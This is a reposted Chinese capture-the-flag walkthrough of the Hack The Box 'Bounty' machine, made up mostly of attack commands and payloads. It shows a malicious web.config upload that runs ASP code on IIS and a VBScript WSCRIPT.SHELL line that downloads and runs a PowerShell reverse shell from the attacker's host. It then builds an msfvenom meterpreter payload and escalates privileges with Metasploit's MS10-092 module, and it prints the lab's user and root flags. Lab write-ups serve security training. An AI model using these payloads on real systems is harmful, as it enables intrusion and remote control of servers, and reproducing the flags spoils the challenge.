您的位置:首页 > 财经 > 金融 > [Meachines] [Easy] bounty web.config 文件上传代码注入+内核MS10-092权限提升

[Meachines] [Easy] bounty web.config 文件上传代码注入+内核MS10-092权限提升

2024/12/23 10:18:00 来源:https://blog.csdn.net/qq_51886509/article/details/141365780  浏览:    关键词:[Meachines] [Easy] bounty web.config 文件上传代码注入+内核MS10-092权限提升

信息收集

IP AddressOpening Ports
10.10.10.93TCP:80

$ nmap -p- 10.10.10.93 --min-rate 1000 -sC -sV

PORT   STATE SERVICE VERSION                                                                │
80/tcp open  http    Microsoft IIS httpd 7.5|_http-server-header: Microsoft-IIS/7.5                                                     │
|_http-title: Bounty                                                                        │
| http-methods:                                                                             │
|_  Potentially risky methods: TRACE                                                        │
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows 

HTTP

image.png

$ feroxbuster -u http://10.10.10.93/ -x asp,aspx,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 100 -s 200,301 -n

image-11.png

image-1.png

web.config 代码注入 & PS 反向shell

image-2.png

但是无法通过访问http://10.10.10.93/UploadedFiles/buff.aspx 执行命令…

这里可以先通过burp爆破文件后缀,可以发现config后缀的文件允许上传

image-3.png

<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.webServer><handlers accessPolicy="Read, Script, Write"><add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         </handlers><security><requestFiltering><fileExtensions><remove fileExtension=".config" /></fileExtensions><hiddenSegments><remove segment="web.config" /></hiddenSegments></requestFiltering></security></system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->

上传web.config,访问http://10.10.10.93/uploadedfiles/web.config发现代码执行了。

image-4.png

$ wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1;echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.24 -Port 10032'>>Invoke-PowerShellTcp.ps1

再次上传web.config

<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.webServer><handlers accessPolicy="Read, Script, Write"><add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /></handlers><security><requestFiltering><fileExtensions><remove fileExtension=".config" /></fileExtensions><hiddenSegments><remove segment="web.config" /></hiddenSegments></requestFiltering></security></system.webServer>
</configuration>
<%@ Language=VBScript %>
<%call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.16.24/Invoke-PowerShellTcp.ps1')")
%>

PS C:\users\merlin\desktop> PS C:\users\merlin\desktop> gci -force

image-5.png

User.txt

be952a25cdc0106a03cbc3deb5d7fd19

权限提升

> systeminfo

image-6.png

内核权限提升 - Metasploit

$ msfconsole

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 0.0.0.0

msf6 exploit(multi/handler) > set LPORT 10033

msf6 exploit(multi/handler) > run

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.24 LPORT=10033 -f psh -o recv.ps1

> iex(new-object net.webclient).downloadstring('http://10.10.16.24/recv.ps1')

> recv.ps1

meterpreter > bg

image-8.png

查看可进行权限提升的漏洞

msf6 > use multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 2
msf6 post(multi/recon/local_exploit_suggester) > run

image-10.png

ms10_092权限提升

msf6 exploit(multi/handler) > use windows/local/ms10_092_schelevator

msf6 exploit(windows/local/ms10_092_schelevator) > set payload windows/x64/meterpreter/reverse_tcp

msf6 exploit(windows/local/ms10_092_schelevator) > set LHOST 10.10.16.24

msf6 exploit(windows/local/ms10_092_schelevator) > set session 2

msf6 exploit(windows/local/ms10_092_schelevator) > set AutoCheck false

msf6 exploit(windows/local/ms10_092_schelevator) > run

image-9.png

Root.txt

2191c45301ab454267720c13689e9b8c

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com